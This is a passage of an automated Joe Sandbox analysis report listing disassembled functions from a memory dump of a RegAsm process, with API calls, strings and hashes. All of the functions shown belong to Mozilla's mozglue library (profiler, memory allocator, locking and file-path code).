Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C130039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C130041
GetCurrentThreadId.KERNEL32 ref: 6C130075
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C130082
moz_xmalloc.MOZGLUE(00000048), ref: 6C130090
free.MOZGLUE(?), ref: 6C130104
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C13011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C13005B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: a4a63601bd6a7c0f9fbd0bcb2467317e2c1eff60f95ee6442dbd6acfcdf29925
Instruction ID: c45e9adf963686082d8e9485368faeaaa42c3aceb1bf9431824360195cab7a79
Opcode Fuzzy Hash: a4a63601bd6a7c0f9fbd0bcb2467317e2c1eff60f95ee6442dbd6acfcdf29925
Instruction Fuzzy Hash: 1C41A0B5600254DFCB10CF25C844AAABBF1FF4A318F40452DE99A83B40D735E819DB91

Function 6C0F7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0F7EA7
malloc.MOZGLUE(00000001), ref: 6C0F7EB3

Part of subcall function 6C0FCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0FCB49
Part of subcall function 6C0FCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0FCBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C0F7EC4
mozalloc_abort.MOZGLUE(?), ref: 6C0F7F19
malloc.MOZGLUE(?), ref: 6C0F7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0F7F4D

Strings

d, xrefs: 6C0F7F89

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 5721eaa411083c01c3d49a6527695d5032fbd5ba0d93b173259428d70133579a
Instruction ID: ccec52af8ae7efab352d179aaee1a90080ce44c4afc27062c5f2da49d9ed36a7
Opcode Fuzzy Hash: 5721eaa411083c01c3d49a6527695d5032fbd5ba0d93b173259428d70133579a
Instruction Fuzzy Hash: 0A310CA1E0438897EB019B69CC046FEB7B8EF95208F459329EC5557712FB30E6D9C391

Function 6C0F3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C0F3EEE
RtlFreeHeap.NTDLL ref: 6C0F3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C0F4006
RtlFreeHeap.NTDLL ref: 6C0F40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F40C2
RtlFreeHeap.NTDLL ref: 6C0F4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F4157

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 496aaa252f5f227d43e04e88a89a26163ecf5c2514adda77a3ae378c69548783
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 79A19BB1A00215DFEB40CF68C98075AB7F5BF48318F6541A9DD29AF702D771E886CBA0

Function 6C0E2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C103F47,?,?,?,6C103F47,6C101A70,?), ref: 6C0E207F
memset.VCRUNTIME140(?,000000E5,6C103F47,?,6C103F47,6C101A70,?), ref: 6C0E20DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C103F47,6C101A70,?), ref: 6C0E211A
EnterCriticalSection.KERNEL32(6C16E744,?,6C103F47,6C101A70,?), ref: 6C0E2145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C103F47,6C101A70,?), ref: 6C0E21BA
EnterCriticalSection.KERNEL32(6C16E744,?,6C103F47,6C101A70,?), ref: 6C0E21E0
LeaveCriticalSection.KERNEL32(6C16E744,?,6C103F47,6C101A70,?), ref: 6C0E2232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C0E2253, 6C0E2268
MOZ_CRASH(), xrefs: 6C0E227D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 127ed61a5438f152c35283bafcaba3cdbb127e09d9b256846134aa6475298088
Instruction ID: 53f66c8e9d4b58ad11317ad6de1cf4e06ceded22ad0f3783cb7e461421725412
Opcode Fuzzy Hash: 127ed61a5438f152c35283bafcaba3cdbb127e09d9b256846134aa6475298088
Instruction Fuzzy Hash: E361E232F412168FCB04CE69CD88B7E77F1AF89318F294279E624A7A94D7709900DA81

Function 6C0E48E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C12483A,?), ref: 6C0E4ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C12483A,?), ref: 6C0E4AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6C12483A,?), ref: 6C0E4A82

Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C12483A,?), ref: 6C0E4A97
moz_xmalloc.MOZGLUE(15D4E801,?,6C12483A,?), ref: 6C0E4A35

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C12483A,?), ref: 6C0E4A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6C12483A,?), ref: 6C0E4AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6C12483A,?), ref: 6C0E4B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6C12483A,?), ref: 6C0E4B2C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 3cebae3bb5eb0a7cd5524b046f69c57c52bd0ad0b8918065744b1a6f6a1038c7
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: AF7169B19007069FCB54DFA8C480AAAB7F4FF08318B54863EE15A9BB41E731F655CB80

Function 6C139D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C138273), ref: 6C139D65
free.MOZGLUE(6C138273,?), ref: 6C139D7C
free.MOZGLUE(?,?), ref: 6C139D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C139E0F
free.MOZGLUE(6C13946B,?,?), ref: 6C139E24
free.MOZGLUE(?,?,?), ref: 6C139E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C139EC8
free.MOZGLUE(6C13946B,?,?,?), ref: 6C139EDF
free.MOZGLUE(?,?,?,?), ref: 6C139EF5

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: e0965e22131800c05d95413003a619698a4a4fb386a8ba182a3f46c4f8c5e15a
Instruction ID: 336c0d0500a570001f6b8fce8807b0a009361ca9665b6071cde8df92b9764179
Opcode Fuzzy Hash: e0965e22131800c05d95413003a619698a4a4fb386a8ba182a3f46c4f8c5e15a
Instruction Fuzzy Hash: 80718EB0909B518BD712CF18C49065BF3F5FF99319B449669E89E5BB02EF30E885CB81

Function 6C13DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C13DDCF

Part of subcall function 6C11FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11FA4B

Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C1390FF
Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C139108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DE0D
free.MOZGLUE(00000000), ref: 6C13DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C12DEFD,?,6C0F4A68), ref: 6C13DF32

Part of subcall function 6C13DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DB86
Part of subcall function 6C13DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C12DEFD,?,6C0F4A68), ref: 6C13DF65
free.MOZGLUE(?), ref: 6C13DF80

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 9699d572d1ccbf526ab660502866028a6e76fef9b64a83eefbadab3b1cf9a0ec
Instruction ID: 13ef22f20d84c6414c2a562b6f4c8eb529b7d4cb7669edce53ecb422e7d56472
Opcode Fuzzy Hash: 9699d572d1ccbf526ab660502866028a6e76fef9b64a83eefbadab3b1cf9a0ec
Instruction Fuzzy Hash: C451F8767116209BD711AB28C8803AEB776BFA130CF96112DD95E53B41DB31F81ACB82

Function 6C13AB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13ABB4
AcquireSRWLockExclusive.KERNEL32(6C0F4A63), ref: 6C13ABC0
ReleaseSRWLockExclusive.KERNEL32 ref: 6C13AC06
GetCurrentThreadId.KERNEL32 ref: 6C13AC16
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13AC27
ReleaseSRWLockExclusive.KERNEL32 ref: 6C13AC66
free.MOZGLUE(?), ref: 6C13AD19
free.MOZGLUE(00000000), ref: 6C13AD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6C13AD38

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: b1a8878dba343e284ffe62d2040619292806b4f35418e91a55c07262fb90a7fa
Instruction ID: 2d7a213768657ca225c51b539cc9e72beca9d4a7f97ee9b663d2c4d5c1e4b79f
Opcode Fuzzy Hash: b1a8878dba343e284ffe62d2040619292806b4f35418e91a55c07262fb90a7fa
Instruction Fuzzy Hash: 6D514974600B018FCB24DF65C488766B7F5FF89718F205A2DE4AA87B50DB31B848CB51

Function 6C13CB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CBE9
std::_Facet_Register.LIBCPMT ref: 6C13CBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CC65

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 93c08a8244e2dd8cb7ed7d336220a96f8b0d1671aeab95a10c0a12b8bd39b6d5
Instruction ID: 1f92290070d56ad2a57cf4940b55425bd2a974551e9d5b01d933f16bfd7751d7
Opcode Fuzzy Hash: 93c08a8244e2dd8cb7ed7d336220a96f8b0d1671aeab95a10c0a12b8bd39b6d5
Instruction Fuzzy Hash: DC4192717003248FCB00EF65C8A8AAD77B5FF99358F044168E5199B751DB35EC05DBA1

Function 6C145D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145DC9
std::_Facet_Register.LIBCPMT ref: 6C145DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145E45

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: ee091ce0d04b98bc12629b38cefec790342044e4e443e700c13a6346d79d1f72
Instruction ID: af1f35cb5c18c618e289823b1ad652612fe589c8196921e50d0132c64a8d6730
Opcode Fuzzy Hash: ee091ce0d04b98bc12629b38cefec790342044e4e443e700c13a6346d79d1f72
Instruction Fuzzy Hash: EC418F717003059FCB00DF65C898AAEBBB5FF89358F548068E50A9B791EB35EC05DB61

Function 6C11CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0E31A7), ref: 6C11CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C11CFA4, 6C11CFB8
<jemalloc>, xrefs: 6C11CF9F, 6C11CFB3

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: f7a20191c6df3b534ea7b3f9c488cc45006c42e41e356627e34c39311aa86a04
Instruction ID: 25038466514ec2fac7365445514f9707c9e73ef781bc101aeaa18db06ae270bc
Opcode Fuzzy Hash: f7a20191c6df3b534ea7b3f9c488cc45006c42e41e356627e34c39311aa86a04
Instruction Fuzzy Hash: CD31E6307492165BEF10AFA68C65BBE7B76AF41718F304078F610ABEC0DB78D5009BA1

Function 6C0EBAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0EBC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0EBD06

Strings

0, xrefs: 6C0EBBCD
y, xrefs: 6C0EBC4E
0, xrefs: 6C0EBC74

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 36148ccd8d5a7e7e487672850a5c1c5f8a39746fbcd6e18dfa6175dd466ad30d
Instruction ID: 2039bc3fa3b44ee724a328bb6885d65e604176ceef2041284d2629c5195a3171
Opcode Fuzzy Hash: 36148ccd8d5a7e7e487672850a5c1c5f8a39746fbcd6e18dfa6175dd466ad30d
Instruction Fuzzy Hash: A161B171A487448FC714DF28C481B5FB7E9AF8D348F004A2EE889A7651EB30D949CB96

Function 6C0EECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0EF100: LoadLibraryW.KERNEL32(shell32,?,6C15D020), ref: 6C0EF122
Part of subcall function 6C0EF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0EF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C0EED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0EEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C0EEDCC
CreateFileW.KERNEL32 ref: 6C0EEE08
free.MOZGLUE(00000000), ref: 6C0EEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C0EEE32

Part of subcall function 6C0EEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C0EEBB5
Part of subcall function 6C0EEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C11D7F3), ref: 6C0EEBC3
Part of subcall function 6C0EEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C11D7F3), ref: 6C0EEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C0EEDC1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 2dd9fdd4478367a3db52a8f8fa21b783c7defde760199d2f9d0a2ec728cee28d
